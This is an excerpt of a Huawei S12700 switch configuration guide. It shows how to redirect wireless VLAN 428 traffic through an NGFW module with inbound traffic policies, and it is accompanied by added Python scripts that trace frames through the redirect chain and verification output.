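from dataclasses import dataclass

SERVICE_VLAN = 428  # wireless service VLAN matched by classifier service_vlan

# Inbound redirection on Switch_1 (ingress interface -> redirect interface), as
# described in the configuration roadmap. Eth-Trunk1 faces ACU2_1, XGE1/0/0 and
# XGE1/0/1 face NGFW_1, XGE3/0/1 faces the upper-layer device.
SWITCH1_INBOUND_REDIRECT = {
    "Eth-Trunk1": "XGigabitEthernet1/0/1",              # upstream -> NGFW
    "XGigabitEthernet1/0/0": "XGigabitEthernet3/0/1",   # back from NGFW -> uplink
    "XGigabitEthernet3/0/1": "XGigabitEthernet1/0/0",   # downstream -> NGFW
    "XGigabitEthernet1/0/1": "Eth-Trunk1",              # back from NGFW -> ACU2
}

# Internal links between Switch_1 (NGFW module in slot 1) and the NGFW's fixed ports.
SWITCH_TO_NGFW = {
    "XGigabitEthernet1/0/0": "GigabitEthernet1/0/0",
    "XGigabitEthernet1/0/1": "GigabitEthernet1/0/1",
}
NGFW_TO_SWITCH = {v: k for k, v in SWITCH_TO_NGFW.items()}

# pair-interface 1: a frame entering one member leaves through the other,
# without a routing or MAC-table lookup.
NGFW_PAIR = {
    "GigabitEthernet1/0/0": "GigabitEthernet1/0/1",
    "GigabitEthernet1/0/1": "GigabitEthernet1/0/0",
}
NGFW_ZONE = {"GigabitEthernet1/0/1": "trust", "GigabitEthernet1/0/0": "untrust"}
# security-policy rules policy1 and policy2 permit trust <-> untrust.
NGFW_PERMIT = {("trust", "untrust"), ("untrust", "trust")}


@dataclass
class Frame:
    vlan: int


def ngfw_forward(in_port, permit=NGFW_PERMIT):
    """Return the NGFW egress port, or None if the security policy denies it."""
    out_port = NGFW_PAIR[in_port]
    if (NGFW_ZONE[in_port], NGFW_ZONE[out_port]) not in permit:
        return None
    return out_port


def trace(frame, ingress, redirects=SWITCH1_INBOUND_REDIRECT, max_hops=8):
    """Walk one frame through Switch_1 and NGFW_1 and return the list of hops.

    Raises RuntimeError when the redirect chain keeps bouncing between the
    switch and the NGFW module, which is what a mis-paired redirect produces.
    """
    hops = [f"Switch_1:{ingress} in"]
    port = ingress
    for _ in range(max_hops):
        if frame.vlan != SERVICE_VLAN or port not in redirects:
            # Assumption: anything not matched by the policy is switched normally.
            hops.append("Switch_1: MAC-table forwarding (no redirect)")
            return hops
        egress = redirects[port]
        hops.append(f"Switch_1:{egress} out")
        if egress not in SWITCH_TO_NGFW:
            return hops  # left toward ACU2_1 or the upper-layer device
        ngfw_in = SWITCH_TO_NGFW[egress]
        ngfw_out = ngfw_forward(ngfw_in)
        if ngfw_out is None:
            hops.append(f"NGFW_1:{ngfw_in} dropped by security policy")
            return hops
        hops.append(f"NGFW_1:{ngfw_in}->{ngfw_out}")
        port = NGFW_TO_SWITCH[ngfw_out]  # re-enters Switch_1; policy matches again
        hops.append(f"Switch_1:{port} in")
    raise RuntimeError("redirect loop between Switch_1 and NGFW_1")


def final_port(hops):
    """Interface through which the frame finally left Switch_1, or None."""
    last = hops[-1]
    return last.split(":", 1)[1][:-4] if last.endswith(" out") else None


def redirect_chain_terminates(redirects):
    """Sanity check: both service-VLAN directions must leave Switch_1."""
    try:
        for ingress in ("Eth-Trunk1", "XGigabitEthernet3/0/1"):
            trace(Frame(SERVICE_VLAN), ingress, redirects)
    except RuntimeError:
        return False
    return True


if __name__ == "__main__":
    for ingress in ("Eth-Trunk1", "XGigabitEthernet3/0/1"):
        print(" -> ".join(trace(Frame(SERVICE_VLAN), ingress)))
```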

Procedure
Step 1 Configure Eth-Trunks between Switch_1 and Switch_2.
# Configure Switch_1.
<HUAWEI> system-view
[HUAWEI] sysname Switch_1
[Switch_1] vlan batch 42 428
[Switch_1] interface Eth-Trunk 0
[Switch_1-Eth-Trunk0] port link-type trunk
[Switch_1-Eth-Trunk0] port trunk allow-pass vlan 42
[Switch_1-Eth-Trunk0] quit
[Switch_1] interface XGigabitEthernet 3/0/2
[Switch_1-XGigabitEthernet3/0/2] eth-trunk 0
[Switch_1-XGigabitEthernet3/0/2] quit
[Switch_1] interface XGigabitEthernet 3/0/3
[Switch_1-XGigabitEthernet3/0/3] eth-trunk 0
[Switch_1-XGigabitEthernet3/0/3] quit

# Configure the connection between Switch_1 and the upper-layer device.
[Switch_1] interface XGigabitEthernet 3/0/1
[Switch_1-XGigabitEthernet3/0/1] port link-type trunk
[Switch_1-XGigabitEthernet3/0/1] port trunk allow-pass vlan 428
[Switch_1-XGigabitEthernet3/0/1] quit

# Configure Eth-trunk0 between Switch_2 and Switch_1.
<HUAWEI> system-view
[HUAWEI] sysname Switch_2
[Switch_2] vlan batch 42 428
[Switch_2] interface Eth-Trunk 0
[Switch_2-Eth-Trunk0] port link-type trunk
[Switch_2-Eth-Trunk0] port trunk allow-pass vlan 42
[Switch_2-Eth-Trunk0] quit
[Switch_2] interface XGigabitEthernet 0/0/1
[Switch_2-XGigabitEthernet0/0/1] eth-trunk 0
[Switch_2-XGigabitEthernet0/0/1] quit
[Switch_2] interface XGigabitEthernet 0/0/2
[Switch_2-XGigabitEthernet0/0/2] eth-trunk 0
[Switch_2-XGigabitEthernet0/0/2] quit

# Configure the interfaces between Switch_2 and AP.
[Switch_2] interface GigabitEthernet 0/0/1
[Switch_2-GigabitEthernet0/0/1] port link-type trunk
[Switch_2-GigabitEthernet0/0/1] port trunk pvid vlan 42
[Switch_2-GigabitEthernet0/0/1] port trunk allow-pass vlan 42
[Switch_2-GigabitEthernet0/0/1] quit

Step 2 Configure Eth-Trunks between Switch_1 and ACU2.
# Configure Switch_1.
[Switch_1] interface Eth-Trunk 1
[Switch_1-Eth-Trunk1] port link-type trunk
[Switch_1-Eth-Trunk1] port trunk allow-pass vlan 42 428
[Switch_1-Eth-Trunk1] quit
[Switch_1] interface XGigabitEthernet 2/0/0 //Switch_1 connects to ACU2 through XGE2/0/0 and XGE2/0/1. The first digit 2 indicates that ACU2 is installed in slot 2 on Switch_1.
[Switch_1-XGigabitEthernet2/0/0] eth-trunk 1
[Switch_1-XGigabitEthernet2/0/0] quit
[Switch_1] interface XGigabitEthernet 2/0/1
[Switch_1-XGigabitEthernet2/0/1] eth-trunk 1
[Switch_1-XGigabitEthernet2/0/1] quit

# Configure ACU2_1 on Switch_1.
<HUAWEI> system-view
[HUAWEI] sysname ACU2_1
[ACU2_1] vlan batch 42 428
[ACU2_1] interface eth-trunk 1
[ACU2_1-Eth-Trunk1] port link-type trunk
[ACU2_1-Eth-Trunk1] port trunk allow-pass vlan 42 428
[ACU2_1-Eth-Trunk1] quit
[ACU2_1] interface XGigabitEthernet0/0/1
[ACU2_1-XGigabitEthernet0/0/1] eth-trunk 1
[ACU2_1-XGigabitEthernet0/0/1] quit
[ACU2_1] interface XGigabitEthernet0/0/2
[ACU2_1-XGigabitEthernet0/0/2] eth-trunk 1
[ACU2_1-XGigabitEthernet0/0/2] quit

Step 3 Configure the interfaces connecting Switch_1 to NGFW.
# Configure Switch_1.
[Switch_1] interface XGigabitEthernet 1/0/0
[Switch_1-XGigabitEthernet1/0/0] port link-type trunk
[Switch_1-XGigabitEthernet1/0/0] mac-address learning disable
[Switch_1-XGigabitEthernet1/0/0] port trunk allow-pass vlan 428
[Switch_1-XGigabitEthernet1/0/0] stp disable
[Switch_1-XGigabitEthernet1/0/0] carrier up-hold-time 10000
[Switch_1-XGigabitEthernet1/0/0] am isolate XGigabitEthernet1/0/1
[Switch_1-XGigabitEthernet1/0/0] quit
[Switch_1] interface XGigabitEthernet 1/0/1
[Switch_1-XGigabitEthernet1/0/1] port link-type trunk
[Switch_1-XGigabitEthernet1/0/1] mac-address learning disable
[Switch_1-XGigabitEthernet1/0/1] port trunk allow-pass vlan 428
[Switch_1-XGigabitEthernet1/0/1] stp disable
[Switch_1-XGigabitEthernet1/0/1] carrier up-hold-time 10000
[Switch_1-XGigabitEthernet1/0/1] am isolate XGigabitEthernet1/0/0
[Switch_1-XGigabitEthernet1/0/1] quit

# Configure NGFW_1 on Switch_1.
<HUAWEI> system-view
[HUAWEI] sysname NGFW_1
[NGFW_1] vlan batch 428
[NGFW_1] interface GigabitEthernet1/0/0
[NGFW_1-GigabitEthernet1/0/0] portswitch
[NGFW_1-GigabitEthernet1/0/0] port link-type trunk
[NGFW_1-GigabitEthernet1/0/0] undo port trunk permit vlan 1
[NGFW_1-GigabitEthernet1/0/0] port trunk permit vlan 428
[NGFW_1-GigabitEthernet1/0/0] quit
[NGFW_1] interface GigabitEthernet1/0/1
[NGFW_1-GigabitEthernet1/0/1] portswitch
[NGFW_1-GigabitEthernet1/0/1] port link-type trunk
[NGFW_1-GigabitEthernet1/0/1] undo port trunk permit vlan 1
[NGFW_1-GigabitEthernet1/0/1] port trunk permit vlan 428
[NGFW_1-GigabitEthernet1/0/1] quit
[NGFW_1] pair-interface 1 GigabitEthernet1/0/0 GigabitEthernet1/0/1 //Add the two interfaces into an interface group. Traffic entering an interface is sent out through a fixed interface, without the need of looking up the routing or MAC address table.

# Add the interfaces on NGFW_1 to the security zones.
[NGFW_1] firewall zone trust
[NGFW_1-zone-trust] add interface GigabitEthernet1/0/1
[NGFW_1-zone-trust] quit
[NGFW_1] firewall zone untrust
[NGFW_1-zone-untrust] add interface GigabitEthernet1/0/0
[NGFW_1-zone-untrust] quit

# Configure a security policy.

NOTE
To facilitate verification, all packets within VLAN 428 are allowed in this example. Modify the security policy after verification if necessary.
[NGFW_1] security-policy
[NGFW_1-policy-security] rule name policy1
[NGFW_1-policy-security-rule-policy1] source-zone trust
[NGFW_1-policy-security-rule-policy1] destination-zone untrust
[NGFW_1-policy-security-rule-policy1] action permit
[NGFW_1-policy-security-rule-policy1] quit
[NGFW_1-policy-security] rule name policy2
[NGFW_1-policy-security-rule-policy2] source-zone untrust
[NGFW_1-policy-security-rule-policy2] destination-zone trust
[NGFW_1-policy-security-rule-policy2] action permit
[NGFW_1-policy-security-rule-policy2] quit
[NGFW_1-policy-security] quit

Step 4 Configure wireless service on ACU2.
# Configure ACU2_1 to assign IP addresses to APs and STAs.
[ACU2_1] dhcp enable
[ACU2_1] interface Vlanif42
[ACU2_1-Vlanif42] ip address 172.18.255.240 255.255.255.0
[ACU2_1-Vlanif42] dhcp select interface
[ACU2_1-Vlanif42] quit
[ACU2_1] interface Vlanif428
[ACU2_1-Vlanif428] ip address 172.16.29.1 255.255.255.0
[ACU2_1-Vlanif428] dhcp select interface
[ACU2_1-Vlanif428] quit

# Configure the country code.
[ACU2_1] wlan ac-global country-code cn
Warning: Modifying the country code will clear channel configurations of the AP
radio using the country code and reset the AP. If the new country code does not
support the radio, all configurations of the radio are cleared. Continue?[Y/N]:y

# Configure the AC ID and carrier ID.
[ACU2_1] wlan ac-global ac id 1 carrier id other
Warning: Modify the carrier ID or AC ID may cause all of the AP offline, continue?
[Y/N]:y

# Configure the source interface on ACU2_1.
[ACU2_1] capwap source interface vlanif42

# Configure basic WLAN services.
[ACU2_1] wlan
[ACU2_1-wlan-view] ap-auth-mode mac-auth
[ACU2_1-wlan-view] ap id 1 type-id 19 mac 9c37-f48c-0c40
[ACU2_1-wlan-ap-1] quit
[ACU2_1-wlan-view] ap-region id 0
[ACU2_1-wlan-ap-region-0] quit
[ACU2_1-wlan-view] ap id 1
[ACU2_1-wlan-ap-1] region-id 0
[ACU2_1-wlan-ap-1] quit
[ACU2_1-wlan-view] wmm-profile name wmm id 1
[ACU2_1-wlan-wmm-prof-wmm] quit
[ACU2_1-wlan-view] radio-profile name radio id 1
[ACU2_1-wlan-radio-prof-radio] wmm-profile name wmm
[ACU2_1-wlan-radio-prof-radio] quit
[ACU2_1-wlan-view] quit
[ACU2_1] interface wlan-ess 1
[ACU2_1-Wlan-Ess1] port hybrid pvid vlan 428
[ACU2_1-Wlan-Ess1] port hybrid untagged vlan 428
[ACU2_1-Wlan-Ess1] quit
[ACU2_1] wlan
[ACU2_1-wlan-view] security-profile name security id 1
[ACU2_1-wlan-sec-prof-security] quit
[ACU2_1-wlan-view] traffic-profile name traffic id 1
[ACU2_1-wlan-traffic-prof-traffic] quit
[ACU2_1-wlan-view] service-set name huawei id 1
[ACU2_1-wlan-service-set-huawei] ssid huawei
[ACU2_1-wlan-service-set-huawei] wlan-ess 1
[ACU2_1-wlan-service-set-huawei] security-profile name security
[ACU2_1-wlan-service-set-huawei] traffic-profile name traffic
[ACU2_1-wlan-service-set-huawei] service-vlan 428
[ACU2_1-wlan-service-set-huawei] forward-mode tunnel
[ACU2_1-wlan-service-set-huawei] quit
[ACU2_1-wlan-view] ap 1 radio 0
[ACU2_1-wlan-radio-0/0] radio-profile name radio
[ACU2_1-wlan-radio-0/0] service-set name huawei
[ACU2_1-wlan-radio-0/0] quit
[ACU2_1-wlan-view] commit ap 1
[ACU2_1-wlan-view] quit

Step 5 Configure traffic policies on each interface of Switch_1.


# Configure a traffic classifier.
[Switch_1] traffic classifier service_vlan operator or precedence 50
[Switch_1-classifier-service_vlan] if-match vlan-id 428 //Configure a traffic
classifier to match wireless service VLAN.
[Switch_1-classifier-service_vlan] quit

# Configure a traffic behavior.


[Switch_1] traffic behavior Redirect_to_XGE3/0/1
[Switch_1-behavior-Redirect_to_XGE3/0/1] permit
[Switch_1-behavior-Redirect_to_XGE3/0/1] redirect interface XGigabitEthernet3/0/1
[Switch_1-behavior-Redirect_to_XGE3/0/1] quit
[Switch_1] traffic behavior Redirect_to_ETH1
[Switch_1-behavior-Redirect_to_ETH1] permit
[Switch_1-behavior-Redirect_to_ETH1] redirect interface Eth-Trunk1


[Switch_1-behavior-Redirect_to_ETH1] quit
[Switch_1] traffic behavior Redirect_to_XGE1/0/0
[Switch_1-behavior-Redirect_to_XGE1/0/0] permit
[Switch_1-behavior-Redirect_to_XGE1/0/0] redirect interface XGigabitEthernet1/0/0
[Switch_1-behavior-Redirect_to_XGE1/0/0] quit
[Switch_1] traffic behavior Redirect_to_XGE1/0/1
[Switch_1-behavior-Redirect_to_XGE1/0/1] permit
[Switch_1-behavior-Redirect_to_XGE1/0/1] redirect interface XGigabitEthernet1/0/1
[Switch_1-behavior-Redirect_to_XGE1/0/1] quit

# Configure traffic policies.


[Switch_1] traffic policy Redirect_to_XGE3/0/1 match-order config
[Switch_1-trafficpolicy-Redirect_to_XGE3/0/1] classifier service_vlan behavior Redirect_to_XGE3/0/1
[Switch_1-trafficpolicy-Redirect_to_XGE3/0/1] quit
[Switch_1] traffic policy Redirect_to_ETH1 match-order config
[Switch_1-trafficpolicy-Redirect_to_ETH1] classifier service_vlan behavior Redirect_to_ETH1
[Switch_1-trafficpolicy-Redirect_to_ETH1] quit
[Switch_1] traffic policy Redirect_to_XGE1/0/0 match-order config
[Switch_1-trafficpolicy-Redirect_to_XGE1/0/0] classifier service_vlan behavior Redirect_to_XGE1/0/0
[Switch_1-trafficpolicy-Redirect_to_XGE1/0/0] quit
[Switch_1] traffic policy Redirect_to_XGE1/0/1 match-order config
[Switch_1-trafficpolicy-Redirect_to_XGE1/0/1] classifier service_vlan behavior Redirect_to_XGE1/0/1
[Switch_1-trafficpolicy-Redirect_to_XGE1/0/1] quit

# Apply a traffic policy to Eth-Trunk 1.


[Switch_1] interface Eth-Trunk1
[Switch_1-Eth-Trunk1] traffic-policy Redirect_to_XGE1/0/1 inbound //Redirect
wireless service traffic forwarded by ACU2 to XGE1/0/1 of Switch_1. This
interface connects to GE1/0/1 of NGFW_1.
[Switch_1-Eth-Trunk1] quit

# Apply a traffic policy to XGE1/0/0.


[Switch_1] interface XGigabitEthernet 1/0/0
[Switch_1-XGigabitEthernet1/0/0] traffic-policy Redirect_to_XGE3/0/1 inbound //
Redirect the wireless traffic forwarded by NGFW to XGE3/0/1.
[Switch_1-XGigabitEthernet1/0/0] quit

# Apply a traffic policy to XGE3/0/1.


[Switch_1] interface XGigabitEthernet 3/0/1
[Switch_1-XGigabitEthernet3/0/1] traffic-policy Redirect_to_XGE1/0/0 inbound //Redirect
downstream wireless traffic to XGE1/0/0 of Switch_1. This interface connects to
GE1/0/0 of NGFW_1.
[Switch_1-XGigabitEthernet3/0/1] quit

# Apply a traffic policy to XGE1/0/1.


[Switch_1] interface XGigabitEthernet 1/0/1
[Switch_1-XGigabitEthernet1/0/1] traffic-policy Redirect_to_ETH1 inbound //
Redirect wireless service traffic forwarded by NGFW to Eth-Trunk1 of Switch_1.
This interface connects to Eth-Trunk1 of ACU2_1.
[Switch_1-XGigabitEthernet1/0/1] quit
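To check that the four inbound traffic policies in Step 5 really carry the wireless VLAN through NGFW_1 once in each direction, the following Python script (an added example, not part of the Huawei document or its products) parses a constructed excerpt of the Switch_1 configuration file from this example and traces a VLAN 428 frame hop by hop. It assumes that the NGFW_1 pair-interface forwards transparently between GE1/0/0 and GE1/0/1 and uses the switch-to-firewall port mapping given in the comments above (XGE1/0/0 to GE1/0/0, XGE1/0/1 to GE1/0/1); the permit lines are left out of the excerpt because they do not affect the path.

```python
# Added example (not from the Huawei document): trace how the four inbound
# redirect policies in Step 5 carry VLAN 428 through NGFW_1 in both directions.

# Constructed excerpt of the Switch_1 configuration file (classifier, behaviors,
# policies, and the interfaces they are applied to).
SWITCH_1_CONFIG = """\
traffic classifier service_vlan operator or precedence 50
 if-match vlan-id 428
#
traffic behavior Redirect_to_XGE3/0/1
 redirect interface XGigabitEthernet3/0/1
traffic behavior Redirect_to_ETH1
 redirect interface Eth-Trunk1
traffic behavior Redirect_to_XGE1/0/0
 redirect interface XGigabitEthernet1/0/0
traffic behavior Redirect_to_XGE1/0/1
 redirect interface XGigabitEthernet1/0/1
#
traffic policy Redirect_to_XGE3/0/1 match-order config
 classifier service_vlan behavior Redirect_to_XGE3/0/1
traffic policy Redirect_to_ETH1 match-order config
 classifier service_vlan behavior Redirect_to_ETH1
traffic policy Redirect_to_XGE1/0/0 match-order config
 classifier service_vlan behavior Redirect_to_XGE1/0/0
traffic policy Redirect_to_XGE1/0/1 match-order config
 classifier service_vlan behavior Redirect_to_XGE1/0/1
#
interface Eth-Trunk1
 traffic-policy Redirect_to_XGE1/0/1 inbound
#
interface XGigabitEthernet1/0/0
 traffic-policy Redirect_to_XGE3/0/1 inbound
#
interface XGigabitEthernet1/0/1
 traffic-policy Redirect_to_ETH1 inbound
#
interface XGigabitEthernet3/0/1
 traffic-policy Redirect_to_XGE1/0/0 inbound
"""

# Assumption: NGFW_1 bridges GE1/0/0 and GE1/0/1 (pair-interface 1). Switch_1
# XGE1/0/0 connects to GE1/0/0 and XGE1/0/1 to GE1/0/1, so a frame the switch
# sends out of one port of the pair comes back in on the other after inspection.
FIREWALL_PAIR = {"XGigabitEthernet1/0/0": "XGigabitEthernet1/0/1",
                 "XGigabitEthernet1/0/1": "XGigabitEthernet1/0/0"}


def parse_redirect_config(config):
    """Return (classifier VLANs, behavior targets, policy bindings, applied policies)."""
    classifiers, behaviors, policies, applied = {}, {}, {}, {}
    section = (None, None)
    for raw in config.splitlines():
        words = raw.split()
        if not words or words[0] == "#":
            continue
        if words[:2] == ["traffic", "classifier"]:
            section = ("classifier", words[2])
            classifiers[words[2]] = set()
        elif words[:2] == ["traffic", "behavior"]:
            section = ("behavior", words[2])
        elif words[:2] == ["traffic", "policy"]:
            section = ("policy", words[2])
        elif words[0] == "interface":
            section = ("interface", words[1])
        elif words[:2] == ["if-match", "vlan-id"] and section[0] == "classifier":
            classifiers[section[1]].add(int(words[2]))
        elif words[:2] == ["redirect", "interface"] and section[0] == "behavior":
            behaviors[section[1]] = words[2]
        elif words[0] == "classifier" and section[0] == "policy":
            policies[section[1]] = (words[1], words[3])   # (classifier, behavior)
        elif words[0] == "traffic-policy" and section[0] == "interface":
            applied[section[1]] = (words[1], words[2])    # (policy, direction)
    return classifiers, behaviors, policies, applied


def trace_frame(ingress, vlan, config=SWITCH_1_CONFIG):
    """Follow a frame tagged with `vlan` arriving on `ingress` through inbound
    redirects and firewall passes until it leaves the switch. Returns the list
    of ports touched and how many times the frame crossed the firewall."""
    classifiers, behaviors, policies, applied = parse_redirect_config(config)
    path, port, fw_passes = [ingress], ingress, 0
    for _ in range(16):                              # loop guard
        if port not in applied or applied[port][1] != "inbound":
            return path, fw_passes
        cls, beh = policies[applied[port][0]]
        if vlan not in classifiers[cls]:
            return path, fw_passes                   # not matched: normal forwarding
        egress = behaviors[beh]
        path.append(egress)
        if egress not in FIREWALL_PAIR:
            return path, fw_passes                   # left the switch (core or ACU side)
        fw_passes += 1
        port = FIREWALL_PAIR[egress]                 # re-enters on the pair's other port
        path.append(port)
    raise RuntimeError("redirect loop detected")


if __name__ == "__main__":
    for port in ("Eth-Trunk1", "XGigabitEthernet3/0/1"):
        print(port, "->", *trace_frame(port, 428))
    print("VLAN 42 on Eth-Trunk1:", trace_frame("Eth-Trunk1", 42))
```

Tracing a frame on VLAN 42 shows that it is not matched by the classifier and so never reaches the firewall: only the service VLAN is inspected. A change that left one direction without its redirect would show up as a path with zero firewall passes, which is the property worth asserting whenever these policies are edited.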

Step 6 Verify the configuration.


# Check the configurations on Switch_1.
<Switch_1> display device
S7703's Device status:
Slot  Sub  Type          Online    Power     Register    Status   Role
-------------------------------------------------------------------------------
1     -    LE1D2FW00S01  Present   PowerOn   Registered  Normal   NA
2     -    ACU2          Present   PowerOn   Registered  Normal   NA
3     -    ES0D0X4UXA00  Present   PowerOn   Registered  Normal   NA
4     -    ES0D00MCUA00  Present   PowerOn   Registered  Normal   Master
PWR1  -    -             Present   PowerOn   Registered  Normal   NA
FAN1  -    -             Present   PowerOn   Registered  Normal   NA

# Check that the Eth-Trunk 1 status between ACU2 and Switch_1 is normal.
<ACU2_1> display interface brief | include up
PHY: Physical
*down: administratively down
(l): loopback
(s): spoofing
(b): BFD down
(e): ETHOAM down
InUti/OutUti: input utility/output utility
Interface PHY Protocol InUti OutUti inErrors outErrors
Eth-Trunk1 up up 0.01% 0.01% 0 0
XGigabitEthernet0/0/1 up up 0.01% 0.01% 0 0
XGigabitEthernet0/0/2 up up 0% 0% 0 0

# After an AP is powered on, check that the AP status is normal.


<ACU2_1> display ap all
All AP information:
Normal[1],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP   AP            AP              Profile/Region   AP       AP
ID   Type          MAC             ID               State    Sysname
------------------------------------------------------------------------------
1    AP6010DN-AGN  9c37-f48c-0c40  0/0              normal   ap-1
------------------------------------------------------------------------------
Total number: 1,printed: 1

# Check that the STAs are online.


<ACU2_1> display access-user
------------------------------------------------------------------------------
UserID   Username        IP address       MAC               Status
------------------------------------------------------------------------------
68       986cf56f7e20    172.16.29.254    986c-f56f-7e20    Success
------------------------------------------------------------------------------
Total: 1, printed: 1

# Check that traffic statistics on each interface of Switch_1 are correct.


<Switch_1> display interface Eth-Trunk0
Eth-Trunk0 current state : UP
Line protocol current state : UP
Description: to Core
Switch Port, Link-type : trunk(configured),
PVID : 1, Hash arithmetic : According to SIP-XOR-DIP,Maximal BW:40G, Current
BW: 40G, The Maximum Frame Length is 9216
IP Sending Frames' Format is PKTFMT_ETHNT_2, Hardware address is d4b1-10b3-2bde
Current system time: 2016-03-12 17:16:08
Last 300 seconds input rate 5128 bits/sec, 5 packets/sec
Last 300 seconds output rate 7184 bits/sec, 6 packets/sec
Input: 996134 packets, 122502357 bytes
Unicast: 871023, Multicast: 17723
Broadcast: 107988, Jumbo: 0
Discard: 0, Pause: 0

Frames: 0

Total Error: 0
CRC: 0, Giants: 0
Jabbers: 0, Fragments: 0
Runts: 0, DropEvents: 0
Alignments: 0, Symbols: 0
Ignoreds: 0, Frames: 0

Output: 1085606 packets, 134379838 bytes
Unicast: 309565, Multicast: 343925
Broadcast: 432116, Jumbo: 0
Discard: 0, Pause: 0

Total Error: 0
Collisions: 0, ExcessiveCollisions: 0
Late Collisions: 0, Deferreds: 0
Buffers Purged: 0

Input bandwidth utilization : 0%
Output bandwidth utilization : 0%
-----------------------------------------------------
PortName Status Weight
-----------------------------------------------------
XGigabitEthernet3/0/2 UP 1
XGigabitEthernet3/0/3 UP 1
-----------------------------------------------------
The Number of Ports in Trunk : 2
The Number of UP Ports in Trunk : 2
<Switch_1> display interface Eth-Trunk1
Eth-Trunk1 current state : UP
Line protocol current state : UP
Description: to ACU_1 Slot2
Switch Port, Link-type : trunk(configured),
PVID : 1, Hash arithmetic : According to SIP-XOR-DIP,Maximal BW:40G, Current
BW: 40G, The Maximum Frame Length is 9216
IP Sending Frames' Format is PKTFMT_ETHNT_2, Hardware address is d4b1-10b3-2bde
Current system time: 2016-03-12 17:16:09
Last 300 seconds input rate 5608 bits/sec, 4 packets/sec
Last 300 seconds output rate 6480 bits/sec, 4 packets/sec
Input: 1046610 packets, 131462045 bytes
Unicast: 568448, Multicast: 41189
Broadcast: 433973, Jumbo: 333
Discard: 0, Pause: 0
Frames: 0

Total Error: 0
CRC: 0, Giants: 0
Jabbers: 0, Fragments: 0
Runts: 0, DropEvents: 0
Alignments: 0, Symbols: 0
Ignoreds: 0, Frames: 0

Output: 1603637 packets, 226275601 bytes
Unicast: 1114078, Multicast: 381346
Broadcast: 108213, Jumbo: 0
Discard: 0, Pause: 0

Total Error: 0
Collisions: 0, ExcessiveCollisions: 0
Late Collisions: 0, Deferreds: 0
Buffers Purged: 0

Input bandwidth utilization : 0%
Output bandwidth utilization : 0%
-----------------------------------------------------
PortName Status Weight
-----------------------------------------------------
XGigabitEthernet2/0/0 UP 1

XGigabitEthernet2/0/1 UP 1
-----------------------------------------------------
The Number of Ports in Trunk : 2
The Number of UP Ports in Trunk : 2

----End

Configuration Files
l Switch_1 configuration file

#
sysname Switch_1

#
vlan batch 42 428
#
traffic classifier service_vlan operator or precedence 50
if-match vlan-id 428
#
traffic behavior Redirect_to_XGE3/0/1
permit
redirect interface XGigabitEthernet3/0/1
traffic behavior Redirect_to_ETH1
permit
redirect interface Eth-Trunk1
traffic behavior Redirect_to_XGE1/0/0
permit
redirect interface XGigabitEthernet1/0/0
traffic behavior Redirect_to_XGE1/0/1
permit
redirect interface XGigabitEthernet1/0/1
#
traffic policy Redirect_to_XGE3/0/1 match-order config
classifier service_vlan behavior Redirect_to_XGE3/0/1
traffic policy Redirect_to_ETH1 match-order config
classifier service_vlan behavior Redirect_to_ETH1
traffic policy Redirect_to_XGE1/0/0 match-order config
classifier service_vlan behavior Redirect_to_XGE1/0/0
traffic policy Redirect_to_XGE1/0/1 match-order config
classifier service_vlan behavior Redirect_to_XGE1/0/1
#
interface Eth-Trunk0
description to Core
port link-type trunk
port trunk allow-pass vlan 42
#
interface Eth-Trunk1
description to ACU_1 Slot2
port link-type trunk
port trunk allow-pass vlan 42 428
traffic-policy Redirect_to_XGE1/0/1 inbound
#
interface XGigabitEthernet1/0/0
port link-type trunk
mac-address learning disable
port trunk allow-pass vlan 428
stp disable
traffic-policy Redirect_to_XGE3/0/1 inbound
carrier up-hold-time 10000
am isolate XGigabitEthernet1/0/1
#
interface XGigabitEthernet1/0/1
port link-type trunk
mac-address learning disable
port trunk allow-pass vlan 428
stp disable
traffic-policy Redirect_to_ETH1 inbound

carrier up-hold-time 10000
am isolate XGigabitEthernet1/0/0
#
interface XGigabitEthernet2/0/0
eth-trunk 1
#
interface XGigabitEthernet2/0/1
eth-trunk 1
#
interface XGigabitEthernet3/0/1
port link-type trunk
port trunk allow-pass vlan 428
traffic-policy Redirect_to_XGE1/0/0 inbound

#
interface XGigabitEthernet3/0/2
eth-trunk 0
#
interface XGigabitEthernet3/0/3
eth-trunk 0
#
return
l Switch_2 configuration file
#
sysname Switch_2

#
vlan batch 42
#
interface Eth-Trunk0
port link-type trunk
port trunk allow-pass vlan 42
#
interface XGigabitEthernet0/0/1
eth-trunk 0
#
interface XGigabitEthernet0/0/2
eth-trunk 0
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 42
port trunk allow-pass vlan 42
#
return
l ACU2_1 configuration file
#
sysname ACU2_1
#
vlan batch 42 428
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
interface Vlanif42
ip address 172.18.255.240 255.255.255.0
dhcp select interface
#
interface Vlanif428
ip address 172.16.29.1 255.255.255.0
dhcp select interface
#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 42
#
interface XGigabitEthernet0/0/1
eth-trunk 1

#
interface XGigabitEthernet0/0/2
eth-trunk 1
#
interface Wlan-Ess1
port hybrid pvid vlan 428
port hybrid untagged vlan 428
#
capwap source interface vlanif42
#
wlan
ap-region id 0
ap-auth-mode mac-auth
ap id 1 type-id 19 mac 9c37-f48c-0c40 sn 21023585619WF6000564
region-id 0
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
service-set name huawei id 1
forward-mode tunnel
wlan-ess 1
ssid huawei
traffic-profile id 1
security-profile id 1
service-vlan 428
radio-profile name radio id 1
wmm-profile id 1
ap 1 radio 0
radio-profile id 1
service-set id 1 wlan 1
#
return

l NGFW_1 configuration file


#
sysname NGFW_1
#
vlan batch 428
#
pair-interface 1 GigabitEthernet1/0/0 GigabitEthernet1/0/1
#
interface GigabitEthernet1/0/0
portswitch
port link-type trunk
undo port trunk permit vlan 1
port trunk permit vlan 428
#
interface GigabitEthernet1/0/1
portswitch
port link-type trunk
undo port trunk permit vlan 1
port trunk permit vlan 428
#
firewall zone trust
set priority 85
add interface GigabitEthernet1/0/1
#
firewall zone untrust
set priority 5
add interface GigabitEthernet1/0/0
#
security-policy
rule name policy1
source-zone trust
destination-zone untrust
action permit
rule name policy2
source-zone untrust
destination-zone trust

Issue 10 (2016-10-30) Huawei Proprietary and Confidential 199


Copyright © Huawei Technologies Co., Ltd.
S12700 Series Agile Switches
Typical Configuration Examples 2 Comprehensive configuration example

action permit
#
return


3 Typical Login Configuration

About This Chapter

